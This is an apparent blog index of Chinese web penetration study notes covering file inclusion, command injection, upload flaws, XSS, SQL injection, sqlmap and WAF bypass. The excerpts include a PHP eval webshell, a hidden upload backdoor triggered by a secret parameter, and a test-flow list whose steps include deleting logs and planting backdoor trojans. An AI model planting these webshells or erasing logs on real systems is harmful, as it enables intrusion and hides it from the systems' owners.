web渗透
黑客笔记
好先生·
这个作者很懒,什么都没留下…
展开
-
IIS7/8找不到服务器证书
不要在网站哪里查看,在最顶层的目录下点击查看IIS就会出现。原创 2021-04-13 21:41:05 · 1006 阅读 · 0 评论 -
<web渗透-文件包含漏洞利用>
(1) .读取敏感文件利用文件包含漏洞读取任意文件,读取文件的时候有利用条件@目标主机文件存在 (目标文件的绝对路径,相对路径)@具有文件的可读权限提交参数 绝对路径 ?path=c:\路径\ 尝试相对路径 ?path=..\..\..\..\..\..\路径\ (2) .直接包含图片木马 将木马信息写入图片附加信息中 图片附加信息 版权等. <?php @eval($_REQUEST[777])?> 使用菜刀连接(3原创 2020-11-25 22:34:35 · 445 阅读 · 0 评论 -
<web渗透-问件包含漏洞>
(1) .概述程序开发人员通常会把可重复使用的函数写在单个文件中在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程称为文件包含程序开发人员都希望代码更加灵活,所有通常会把被包含的文件设置为变量,进行动态调用,正由于这阵灵活性导致客户端可以调用任意文件,造成文件包含漏洞(2) .php中文件包含函数 区别include() 文件包含失败时会产生警告,脚本继续执行include_once() 与inlude()原创 2020-11-25 22:33:32 · 72 阅读 · 0 评论 -
<web渗透-系统命令注入>
(1) .OS命令类似于编程语言注入一样,一些应用程序需要去调用一些外部程序应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,就会造成命令执行的漏洞.危害-继承WEB服务器程序权限,执行系统命令-继承WEB服务器程序权限,读写文件-反弹shell-控制整个网站-控制整个服务器.存在原因用户输入作为拼接没有安全过滤.相关函数【1】 .system() 将字符串作为OS命令进行执行 自动输出原创 2020-11-25 22:32:07 · 472 阅读 · 0 评论 -
<web渗透-一句话小马>
<!--------------------------一句话木马,加入当任何页面中 url 添加?hacker=2b 可上传文件----------------------------><?phpif($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile"]原创 2020-11-25 22:30:55 · 195 阅读 · 0 评论 -
<web渗透-文件上传漏洞-00阶段&htaccess攻击>
(1) .00截断00就是null空字符,URl中表现为%00,00截断会导致文件上传路径截断upload-lab 11关(2) .htaccess 攻击是Apache服务器的分布式配置文件该配置文件会覆盖Apache服务的全局配置 作用域: 当前目录及其子目录 如果一个web应用允许上传.htaccess文件,那就意味着 攻击者可以更改Apache的配置 .htaccess攻击想象空间非常大 首先看Apache的配置,允许.htaccess 文件覆盖掉Apa原创 2020-11-25 22:28:51 · 381 阅读 · 0 评论 -
<web渗透-文件上传漏洞>
(1) .简述是web开发的必备功能之一,上传头像,上传共享文件,上传网站脚本等如果服务器配置不当或者没有进行过滤,web用户上传任意文件包括脚本文件,而exe程序等.漏洞成因文件上传漏洞的成因,一方吗服务器配置不当导致任意文件上传web应用开发了文件上传功能,并且对上传的问件没有进行足够的限制开发部署时没有考虑到系统特性和验证和过滤不严而导致被绕过,上传任意文件.漏洞危害上传漏洞最直接的威胁就是上传任意文件,包括恶意脚本,程序等如果web服务器保存的上传文件的可写目录具有执行权限那么原创 2020-11-20 21:47:48 · 397 阅读 · 0 评论 -
<web渗透-xss介绍>
(1) .简介--称为跨站脚本攻击 -主要基于.javascript_js 完成恶意的攻击行为 -js可以灵活的操作html,css和浏览器--XSS通过精心构造(js)代码注入到网页中 由浏览器解释运行这段js,以达到攻击 -用户访问网页时,XSS脚本就会被提取出来 用户浏览器解析后就会收到攻击--用户最简单的动作就是使用浏览器上网,并且浏览器中 存在javascript解析器, 但解析器并不会判断代码是否恶意 .XSS的漏洞在服务器上 .XSS的攻击对象原创 2020-11-20 21:45:38 · 265 阅读 · 0 评论 -
<web渗透-beef使用>
【1】.beffxss漏洞利用平台--beef简单使用 Kali工具 目录 /usr/share/beef-xss 配置文件 config.yaml 启动 ./beef beef-xss 修改默认用户和密码 vim config.yaml credentials user:"" pass:"" '通过web界面访问' web ui http://ip:3000/ui/panel shellcode原创 2020-11-20 21:44:51 · 456 阅读 · 0 评论 -
<web渗透-xss防御>
(1) .使用XSS Filter 作用:过滤用户(客户端)提交的有害信息,从而达到 防范XSS攻击的效果 【1】.输入过滤 "永远不要相信用户的输入" 是网站开发的基本常识 对于用户输入一点要多次深入过滤 ===输入验证 输入验证就是对用户提交的信息进行有效验证 仅接受指定长度范围内的,采用适当格式的内容提交原创 2020-11-20 21:43:21 · 182 阅读 · 0 评论 -
<web渗透-waf绕过规则>
原创 2020-11-19 12:19:33 · 206 阅读 · 0 评论 -
<web渗透-waf绕过>
WAF绕过定义:Web应用防护系统(Web Application Firewall, 简称:WAF)代表了一类新兴的信息安全技术,用以解决诸如防火墙一类传统设备束手无策的Web应用安全问题。【*】熟练掌握mysql函数和语法使用方法输入了解中间件运行处理机制了解WAF防护原理和方法【白盒绕过】sqli-25关使用了blacklist函数过滤了’or’和’AND’ 绕过过滤 (1)大小写变形:oR,OR, (2)等价替换: and->&& o.原创 2020-11-19 12:18:25 · 250 阅读 · 0 评论 -
<web渗透-mysql注入函数>
‘SQL注入是常见的WEB安全漏洞,攻击者利用这个漏洞,可以访问修改数据或者利用潜在的数据库漏洞进行攻击’(1) .漏洞原理针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破解原有SQL结构,达到编写程序意料之外的攻击行为其成因可以归结:【1】.程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句【2】.未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句“注入点可能存在位置”根据SQL注入漏洞的原理,在用户"可控参数"中注入SQL语法原创 2020-11-19 12:17:34 · 121 阅读 · 0 评论 -
<web渗透-mysql注入方法>
(1) .扫描后台工具御剑扫描后台信息其他后台扫描工具(3) .联合查询注入SQL语法中的 union select会同时执行两条查询语句将查询结果拼接在一起两张表必须列数相同--判断表中列数 '使用order' -?id=1 order by 1/2/n 试出列数n '使用联合查询' -?id=1 union select 1,2,3,4,...,n -?id=1 union select null,null,null,null,...,n原创 2020-11-19 12:16:27 · 177 阅读 · 0 评论 -
<web渗透-sqlmap自动化注入>
sqlmap参数大全cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数"绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --db原创 2020-11-19 12:15:23 · 504 阅读 · 0 评论 -
<web渗透-sql注入流程>
原创 2020-11-19 12:14:29 · 169 阅读 · 0 评论 -
<web渗透-扫描技术>
(1) .nmap工具"资产发现" 发现目标环境中有哪些资产,联网设备,主机,服务器 其他服务 扫描神器 nmap工具 主机发现 主机在线 IP地址 端口扫描 开启服务 端口上的服务 kali使用桥接 主机连接 ssh user@IP地址 pass(2) .参数__参数顺序可以调换"IP格式" 192.168.0.0/掩码 || 192.168.0.* . "wireshark抓包工具 .匹配条件 i原创 2020-11-19 12:13:49 · 202 阅读 · 0 评论 -
<web渗透-信息收集过方法>
.在规定了测试范围后需要进入信息收集阶段渗透人员需要各种公开资源竟可能获取测试目标的信息(1) .互联网渠道论坛公告板新闻组媒体文章博客社交网络其他商业性或非商业性的网站github等等….借助各种搜索引擎谷歌雅虎MSN必应 百度信息包括{DNS服务器路有关系whois数据库电子邮件电话号码个人信息用户账户等}信息越多,渗透测试成功率越高(2) .流程“测试网站”【】http://testfire.net【】http://vulnweb.com漏原创 2020-11-19 12:12:59 · 392 阅读 · 1 评论 -
<代码审计流程>
把握大局 --> 定向功能 --> 敏感函数参数回溯**把握大局*网站结构浏览源码文件夹,了解程序的大致目录*入口文件index.php admin.php文件一般使整个程序的入口,详细读一下index文件可以知道程序的架构运行流程、包含哪些配置文件、包含哪些过滤文件以及包含哪些安全过滤文件了解程序的业务逻辑*配置文件一般类似config.php 等文件保存一些数据库相关的信息;程序的一些信息。先看看数据库编码,如果是gbk则可能存在宽字节注入如果变量的值用原创 2020-11-19 12:12:00 · 789 阅读 · 0 评论 -
<简单黑客测试流程>
0 .被授权1 .信息收集2 .扫描漏洞namp 扫描出ip范围 端口3 .漏洞利用4 .拿到最高权限5 .删除操作日志6 .留后门木马7 .渗透测试报告原创 2020-11-19 12:10:54 · 201 阅读 · 0 评论 -
《计算机通信--OSI模型》
最近在学习计算机通信原理,看到了这本书推荐给大家,特别适合入门的去学习,学习计算机就要知道它是如何与其他电脑联网通信的,这些基础知识对日后学习其他的计算机知识必不可缺少的。学习后自己对OSI模型的一些愚见淘宝APP来说 OSI----- 7.应用层你在淘宝上买了一些东西,你点击购买付钱,签订订单的承诺合同,你和卖家之间就有了一种协议这是应用层-----6.表示层卖家根据你购买的信息,...原创 2020-01-19 13:03:24 · 165 阅读 · 0 评论 -
《内网与外网---基础术语》
最近在看到内网与外网的区别时有点疑惑然后在论坛中找到了一篇写的特别好的文章分享给大家内网ip和外网ip的联系以及连接过程https://blog.csdn.net/Alexwym/article/details/81772446...原创 2019-12-30 11:22:02 · 333 阅读 · 0 评论